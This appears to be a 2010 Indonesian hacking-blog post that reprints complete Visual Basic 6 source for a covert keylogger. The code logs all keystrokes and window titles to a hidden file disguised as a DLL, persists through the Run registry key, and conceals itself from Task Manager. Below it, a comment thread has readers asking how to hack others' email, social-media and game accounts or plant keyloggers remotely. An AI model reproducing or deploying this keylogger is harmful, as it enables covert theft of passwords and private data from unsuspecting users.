Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Keylogger – Keylogging

24 February 2010
Penulis:   · Kategori Artikel: Cracking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Sumber : spyrozone.net

berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.

Yang perlu diperhatikan :

1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).

2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)

3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)

4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig

5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(

======= code mulai ==========================

‘simpan file hasil compile dg nama regsvc32.exe

‘form

‘simpan dg nama FRMLOG.frm

Option Explicit

Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer

Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long

Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long

Private sAppName As String

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

Private Const VK_BACK = &H8

Private Const VK_CONTROL = &H11

Private Const VK_SHIFT = &H10

Private Const VK_TAB = &H9

Private Const VK_RETURN = &HD

Private Const VK_MENU = &H12

Private Const VK_ESCAPE = &H1B

Private Const VK_CAPITAL = &H14

Private Const VK_SPACE = &H20

Private Const VK_SNAPSHOT = &H2C

Private Const VK_UP = &H26

Private Const VK_DOWN = &H28

Private Const VK_LEFT = &H25

Private Const VK_RIGHT = &H27

Private Const VK_MBUTTON = &H4

Private Const VK_RBUTTON = &H2

Private Const VK_LBUTTON = &H1

Private Const VK_PERIOD = &HBE

Private Const VK_COMMA = &HBC

Private Const VK_NUMLOCK = &H90

Private Const VK_NUMPAD0 = &H60

Private Const VK_NUMPAD1 = &H61

Private Const VK_NUMPAD2 = &H62

Private Const VK_NUMPAD3 = &H63

Private Const VK_NUMPAD4 = &H64

Private Const VK_NUMPAD5 = &H65

Private Const VK_NUMPAD6 = &H66

Private Const VK_NUMPAD7 = &H67

Private Const VK_NUMPAD8 = &H68

Private Const VK_NUMPAD9 = &H69

Private Const VK_F9 = &H78

Private Const VK_F8 = &H77

Private Const VK_F7 = &H76

Private Const VK_F6 = &H75

Private Const VK_F5 = &H74

Private Const VK_F4 = &H73

Private Const VK_F3 = &H72

Private Const VK_F2 = &H71

Private Const VK_F12 = &H7B

Private Const VK_F11 = &H7A

Private Const VK_F10 = &H79

Private Const VK_F1 = &H70

Private Sub LoadTextFile()

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & “settings.ini” For Input As #1

Line Input #1, sAppName

Close

Else

Open App.Path & “\settings.ini” For Input As #1

Line Input #1, sAppName

Close

End If

If sAppName = vbNullString Then

sAppName = “regsvc32″

End If

Exit Sub

dlgerror:

sAppName = “regsvc32″

End Sub

Private Sub SAVEDLL()

Dim nSaveLocation As String

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & sAppName & “.dll”

GoTo READY

Else

Open App.Path & “\” & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & “\” & sAppName & “.dll”

GoTo READY

End If

READY:

If txtLOGGED.Text = vbNullString Then

Exit Sub

End If

Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf

Close

Close

Close

SetAttr nSaveLocation, vbHidden

Exit Sub

dlgerror:

Err.Clear

Exit Sub

End Sub

Private Sub Form_Load()

On Error Resume Next

Call LoadTextFile

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = sAppName

ENTERREGISTRY

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub ENTERREGISTRY()

Dim nKey As Long

RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey

If Len(App.Path) <= 3 Then

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)

Else

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)

End If

End Sub

Private Sub Form_Unload(Cancel As Integer)

Cancel = True

Call SAVEDLL

ENTERREGISTRY

Unload Me

End

End Sub

Private Sub tmrCAPTION_Timer()

On Error Resume Next

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = False

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub tmrLOG_Timer()

On Error Resume Next

Dim nKey, nChar As Integer

Dim nText As String

For nChar = 1 To 255

nKey = GetAsyncKeyState(nChar)

If nKey = -32767 Then

nText = Chr(nChar)

If nChar = VK_BACK Then

nText = ” {B.S} ”

ElseIf nChar = VK_CONTROL Then

nText = ” {CTRL} ”

ElseIf nChar = VK_SHIFT Then

nText = ” {SHIFT} ”

ElseIf nChar = VK_TAB Then

nText = ” {TAB} ”

ElseIf nChar = VK_RETURN Then

nText = ” {ENTER} ”

ElseIf nChar = VK_MENU Then

nText = ” {ALT} ”

ElseIf nChar = VK_ESCAPE Then

nText = ” {ESC} ”

ElseIf nChar = VK_CAPITAL Then

nText = ” {CAPS} ”

ElseIf nChar = VK_SPACE Then

nText = ” {SP.B} ”

ElseIf nChar = VK_UP Then

nText = ” {UP} ”

ElseIf nChar = VK_LEFT Then

nText = ” {LEFT} ”

ElseIf nChar = VK_RIGHT Then

nText = ” {RIGHT} ”

ElseIf nChar = VK_DOWN Then

nText = ” {DOWN} ”

ElseIf nChar = VK_F1 Then

nText = ” {F1} ”

ElseIf nChar = VK_F2 Then

nText = ” {F2} ”

ElseIf nChar = VK_F3 Then

nText = ” {F3} ”

ElseIf nChar = VK_F4 Then

nText = ” {F4} ”

ElseIf nChar = VK_F5 Then

nText = ” {F5} ”

ElseIf nChar = VK_F6 Then

nText = ” {F6} ”

ElseIf nChar = VK_F7 Then

nText = ” {F7} ”

ElseIf nChar = VK_F8 Then

nText = ” {F8} ”

ElseIf nChar = VK_F9 Then

nText = “{F9}”

ElseIf nChar = VK_F10 Then

nText = ” {F10} ”

ElseIf nChar = VK_F11 Then

nText = ” {F11} ”

ElseIf nChar = VK_F12 Then

nText = ” {F12} ”

ElseIf nChar = VK_SNAPSHOT Then

nText = ” {PRINT SCRN} ”

ElseIf nChar = VK_RBUTTON Then

nText = ” {R.B} ”

ElseIf nChar = VK_LBUTTON Then

nText = ” {L.B} ”

ElseIf nChar = VK_MBUTTON Then

nText = ” {M.B} ”

ElseIf nChar = VK_PERIOD Then

nText = “.”

ElseIf nChar = VK_COMMA Then

nText = “,”

ElseIf nChar = VK_NUMLOCK Then

nText = ” {NUMLCK} ”

ElseIf nChar = VK_NUMPAD0 Then

nText = “0″

ElseIf nChar = VK_NUMPAD1 Then

nText = “1″

ElseIf nChar = VK_NUMPAD2 Then

nText = “2″

ElseIf nChar = VK_NUMPAD3 Then

nText = “3″

ElseIf nChar = VK_NUMPAD4 Then

nText = “4″

ElseIf nChar = VK_NUMPAD5 Then

nText = “5″

ElseIf nChar = VK_NUMPAD6 Then

nText = “6″

ElseIf nChar = VK_NUMPAD7 Then

nText = “7″

ElseIf nChar = VK_NUMPAD8 Then

nText = “8″

ElseIf nChar = VK_NUMPAD9 Then

nText = “9″

End If

txtLOGGED.Text = txtLOGGED.Text + nText

End If

Next

Call GetActiveWindowName

End Sub

Private Sub tmrSAVE_Timer()

Call SAVEDLL

txtLOGGED.Text = vbNullString

txtENUMERATE.Text = vbNullString

End Sub
====code end ===========

============code mulai ============

‘module visual basic

‘simpan dg nama mdlActiveWindow.bas

Option Explicit

Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Declare Function GetForegroundWindow Lib “user32″ () As Long

Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public nCAPTION As String

Public nTESTER As Long

Public nClass As String

Public Sub GetActiveWindowName()

nCAPTION = Space(256)

nClass = Space(256)

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)

GetClassName GetForegroundWindow, nClass, Len(nClass)

If nTESTER = GetForegroundWindow Then Exit Sub

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass

nTESTER = GetForegroundWindow

End Sub

============= code end =============

/* ——————————|EOF|—————————— */

sumber : spyrozone.net
###############################################################

para master senior BinusHacker, saya dapet source code kelogger ini dr spyrozone.net,
tp saya gak tau gmn cara pemakaian keylogger yg sudah jd kita buat di VB 6.0.(maklum masih cupu n boleh cop-pas. hehe..)
terus jg cara menghilangkan KeyLogger ini dr komputer yg udah terlanjur kena.
tolong dikasih pencerahan??
trimss sebelumny ya.. :)

BINUS HACKER Binus Hacker Chat and Forum

Komentar

33 Komentar Untuk “Keylogger – Keylogging
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. bayank pada 26 February 2010 8:57 pm

    BANG TOLONG SAYA DONK……PLISSSSSSS….
    DI KOMPI SAYA AD ORANG SENGAJA INSTALL REFOG NE….
    SAYA DAH SEARCH D GOOGLE CARA UNINSTALL TAPI GA JADI..
    KARNA REFOG TERSEBUT PAKE PASWORD……

    TOLONG DONK KASIH TAU CARA TEMBUS PASSWORNYA….
    EMAIL, MAHDI.HABU@GMAIL.COM
    TRIMA KASIH BANYAK. SUKSES SELALU….BINUSHACKER

  2. UtuH pada 26 February 2010 9:37 pm

    @Bayank:
    Simple ajah cara deletenya.
    Cari folder yang berhubungan refognya. Pastikan itu file berhubungan dengan keyloggernya.
    Trus tekan: SHIFT + DELETE -> ENTER

    Jika belum bisa, lewat safemode.
    Klo masih belum bisa, bermain”lah dengan REGEDIT. Cari file yang berhubungan dengan keylogger tersebut. Delete Valuenya.

    Info lengkap manual deletenya silakan baca list dibawah ini:

    http://searchg.symantec.com/search?q=REFOG&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=gbh&x=0&y=0

    Done! Enjoy & Eat It! :)

  3. priqitiew pada 28 February 2010 4:42 pm

    mnta rumusx virus di VB 6.0 yg untuk menggandakan folder sendiri…Please….

  4. hackcenter pada 18 March 2010 8:16 am

    Mungkin ada cara hacking lain… Silahkan liat ke http://hackcenter.wordpress.com untuk informasi hacking lebih lanjut,,,,,,,,,,,

  5. beam pada 18 April 2010 8:21 pm

    bang minta pencerahan dong,block fb bisa di crack g ya?

  6. odracir pada 20 April 2010 3:32 am

    bang saya punya warnet trus ada yg install keylogger gitu…

    padahal saya da deep frezee disk c dan d jd kalo restart balik ke setting awal tpi ko msh bisa ya?

    gimana caranya itu ya?

    dan gimana supaya lbh aman lagi?

    please

  7. marcel_barker pada 26 April 2010 4:14 am

    bang saya mau nnya ni ..ane kan punya software kelogger
    masih terpasang d flashdisk ane
    gmn yaa cara menggunakannya?
    dan ad persyaratan tertentu gak yaa?

  8. vanz_10 pada 28 April 2010 10:37 am

    om bisa tolong saya ga??
    gini ea om..saya pasang keylogger douglas 2.0 di kompi saya,,nah masalahnya saya lupa passwordnya…buat uninstal ltu keylogger harus pke paswwordnya..nah kasih tw dunk cara bwt uninstallnya…kirim aj ea om ke email saya..irvan_einz10@yahoo.com..
    ditunggu ia..
    makasih om…
    pliss

  9. bery mezzaluna pada 15 May 2010 9:46 am

    scan antivirus aja??
    selesai deh??

    AVG
    AVAST
    KASPERSKY

  10. Keylogger – Keylogging « Wallout's pada 17 May 2010 3:27 pm

    [...] View Original Article Blogged with the Flock Browser Categories: Uncategorized Tag:komputer Komentar (0) Lacak Balik (0) Tinggalkan komentar Lacak balik [...]

  11. luqman pada 27 May 2010 12:56 am

    ada yg sdh jadi belum (sdh dicompile)? soalnya saya cupu masalah prgramin

  12. zygort pada 2 June 2010 10:02 am

    :)

  13. zul pada 3 June 2010 8:36 am

    mas klo bisa minta code nya yg untuk VB.net la ma ?

  14. kerropi pada 7 June 2010 10:18 am

    fb ma email dihack, password diganti, security question gk inget…tp alamat emailx kga diganti..
    gmn dong?

    qrimin carax ke email saya ya…kerropi_lover@ymail.com

  15. ando pada 22 June 2010 2:13 am

    bang gimana cara meremot komputer..
    jarak jauh bang..yg mau aku remot nich,jaringan na telkomsel..
    aku dh coba beberapa program tp gak bisa2..yg bisa hanya yg 1 jaringan oank bang..
    aku dh pake..:team viewer
    prorat remotin..dll..
    sama aja smua bang..

    malah aku dh coba di warnet..tuk meremot kantor abang saya..g bisa juga..padahal dah aku instal 2..2 na aplikasi na..dgn versi yang sama tp tetap aj

    mohon ptunjuk na ya bang..aku fans berat binushacker.net lho..

    kirim ke email aku aja ya bang..
    ando143@gmail.com

  16. D-fox pada 1 July 2010 11:57 pm

    BINUS JAYA TERUS YA

  17. Hady Sumarjan pada 7 July 2010 12:23 am

    bro.. bs sharing kg oal friendster… apa ad situs yg bs view profil ni yg ke private..

    mksh sblumnya..

  18. agus182 pada 8 July 2010 11:37 pm

    hidup binushacker

    saya pribadi sangat senang apa bilank ada title sebagai hacker

  19. fajri pada 24 July 2010 3:28 am

    aldo ni mcam jahanam………….

  20. fajri pada 24 July 2010 3:29 am

    bgaimana cara nya…….??…..

  21. kely pada 28 July 2010 8:28 pm

    om,,saya mw tanya keyloger ada ga yg bisa liat password windows???
    mohon bantuan nya,,
    thank’s.

  22. Adel pada 6 August 2010 8:21 am

    bang saya msih cupu nie, saya lg blajar remote pc tp bru bisa jaringan lokal doang. punya tutorial yang remote jarak jauh ga(via internet)? pake program pa?tolong kirim ya ke email aq. Piratea21@yahoo.com. klo bisa yang pak RAT…plizzz bnget bang. thanks. jayalah slallu BINUS HACKER……..!!

  23. muhlis pada 14 August 2010 11:34 am

    Permisi….saya numpang nanya..fb sma email saya di hack sama orng.untuk balikin nya lagi gmn?tolong bantu saya…makasih

  24. nina pada 27 August 2010 9:52 pm

    bisa minta tolong hack email ga mas saya hanya punya info alamat email saja? tlg hub saya 081938362001

  25. denie pada 4 September 2010 10:21 am

    bg mohon ijin minta bantuan ….
    kirim ke email ku cara menghapus atau cara mengganti pass REFOG keylogger…

    maklum ada orang iseng yang mau nyrobot dapur gwa bg….
    tolong ya…..

  26. rgsteja pada 15 September 2010 2:32 pm

    buahh..pada semangat ngejailin yah??…mmm..dikit info..mo remote kompi lewat internet trus masang perangkap,,ato pengen langsung jadi penguasa di sebuah warnet??tanpa terdeteksi ..??mail aja kemari ipul.blenk@gmail.com
    mau tau pencuri beraksi?? yah harus jadi pencuri dulu..hehehehehehehehehe

  27. CUMI12 pada 20 April 2011 3:17 am

    om..bisa gag ya klau masang keylogger jarak jauh…???

  28. sheis pada 20 April 2011 11:43 pm

    bang bantu aku gimana cara nya mengembalikan chip poker yang kena banned tolong donk bang pleaseeeee………. karena aku selalu kena banned kesal rasanya padahal permainan itu hiburan bagiku tolong y bang……………

  29. arul pada 21 December 2011 6:17 am

    bantu donk fb saya hilang tadi di ambil orang bener gw mah nanti yg nemuin di kasih char pb diamon 3 emas

  30. Okki pada 22 December 2011 12:22 pm

    itu koq kodenya error ya bang..saya dah tes di VB 6.0

    mohon pncerahan nya

  31. Who Calls Me pada 13 May 2012 9:18 am

    I got this web site from my friend who informed me concerning
    this website and at the moment this time I am visiting this website and reading
    very informative posts here.

  32. Rafif Rohadiatama pada 4 September 2012 7:37 am

    gan cara menembus Pasword point blank orang gimana ya
    dan berilah keterangan sedikit tentang penggunaan keylongger maklum newbie
    saran masterr bisa taro di rafif_r99@yahoo.com
    thanks ya sebelumnya

  33. http://google.com pada 12 February 2013 11:46 am

    It seems like you truly fully understand plenty pertaining to this particular issue and that exhibits
    with this amazing blog post, labeled “Keylogger – Keylogging”.
    Thanks -Madelaine

Silahkan Berikan Tanggapan Anda...